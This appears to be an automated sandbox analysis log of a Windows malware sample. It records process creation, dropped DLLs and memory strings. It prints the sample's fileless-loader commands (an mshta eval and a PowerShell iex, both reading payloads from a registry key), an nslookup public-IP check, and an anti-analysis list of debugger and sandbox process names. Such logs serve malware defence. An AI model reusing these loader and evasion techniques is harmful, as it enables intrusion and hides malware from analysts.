Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7076 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6792 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6792 CREDAT:82952 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ya1ligq\5ya1ligq.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB088.tmp' 'c:\Users\user\AppData\Local\Temp\5ya1ligq\CSC6D2B83ED4FA544BDA58AEA85D7B55542.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zyvn03im\zyvn03im.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC75B.tmp' 'c:\Users\user\AppData\Local\Temp\zyvn03im\CSCD3BE44FE21F9438DABBEBC9691CFFC2.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\B075.bi1'
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7076 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6792 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6792 CREDAT:82952 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ya1ligq\5ya1ligq.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zyvn03im\zyvn03im.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB088.tmp' 'c:\Users\user\AppData\Local\Temp\5ya1ligq\CSC6D2B83ED4FA544BDA58AEA85D7B55542.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC75B.tmp' 'c:\Users\user\AppData\Local\Temp\zyvn03im\CSCD3BE44FE21F9438DABBEBC9691CFFC2.TMP'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\B075.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001E.00000002.870006317.0000016901C30000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.879615404.0000020BB6FD0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000022.00000002.1107008463.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: \zm.pdb source: powershell.exe, 0000001B.00000003.927722476.000001A056DA6000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000023.00000002.914133723.000002572EECC000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000023.00000002.914133723.000002572EECC000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000022.00000002.1107008463.0000000005A00000.00000002.00000001.sdmp

Source: C:\Windows\explorer.exe	Code function: 34_2_04DA4DCD push 3B000001h; retf	34_2_04DA4DD2
Source: C:\Windows\System32\control.exe	Code function: 35_2_00064DCD push 3B000001h; retf	35_2_00064DD2
Source: C:\Windows\System32\rundll32.exe	Code function: 37_2_0000017896ED4DCD push 3B000001h; retf	37_2_0000017896ED4DD2

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\onerous.tar	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5ya1ligq\5ya1ligq.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\zyvn03im\zyvn03im.dll	Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000001.00000002.692916178.0000016FDC721000.00000004.00000001.sdmp	Binary or memory string: RASP = ARRAY("FRIDA-WINJECTOR-HELPER-64.EXE","FRIDA-WINJECTOR-HELPER-32.EXE","PYTHONW.EXE","PYW.EXE","CMDVIRTH.EXE","ALIVE.EXE","FILEWATCHERSERVICE.EXE","NGVMSVC.EXE","SANDBOXIERPCSS.EXE","ANALYZER.EXE","FORTITRACER.EXE","NSVERCTL.EXE","SBIECTRL.EXE","ANGAR2.EXE","GOATCASPER.EXE","OLLYDBG.EXE","SBIESVC.EXE","APIMONITOR.EXE","GOATCLIENTAPP.EXE","PEID.EXE","SCANHOST.EXE","APISPY.EXE","HIEW32.EXE","PERL.EXE","SCKTOOL.EXE","APISPY32.EXE","HOOKANAAPP.EXE","PETOOLS.EXE","SDCLT.EXE","ASURA.EXE","HOOKEXPLORER.EXE","PEXPLORER.EXE","SFTDCC.EXE","AUTOREPGUI.EXE","HTTPLOG.EXE","PING.EXE","SHUTDOWNMON.EXE","AUTORUNS.EXE","ICESWORD.EXE","PR0C3XP.EXE","SNIFFHIT.EXE","AUTORUNSC.EXE","ICLICKER-RELEASE.EXE",".EXE","PRINCE.EXE","SNOOP.EXE","AUTOSCREENSHOTTER.EXE","IDAG.EXE","PROCANALYZER.EXE","SPKRMON.EXE","AVCTESTSUITE.EXE","IDAG64.EXE","PROCESSHACKER.EXE","SYSANALYZER.EXE","AVZ.EXE","IDAQ.EXE","PROCESSMEMDUMP.EXE","SYSER.EXE","BEHAVIORDUMPER.EXE","IMMUNITYDEBUGGER.EXE","PROCEXP.EXE","SYSTEMEXPLORER.EXE","BINDIFF.EXE","IMPORTREC.EXE","PROCEXP64.EXE","SYSTEMEXPLORERSERVICE.EXE","BTPTRAYICON.EXE","IMUL.EXE","PROCMON.EXE","SYTHON.EXE","CAPTUREBAT.EXE","I
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000001.00000003.686457865.0000016FDC7EA000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
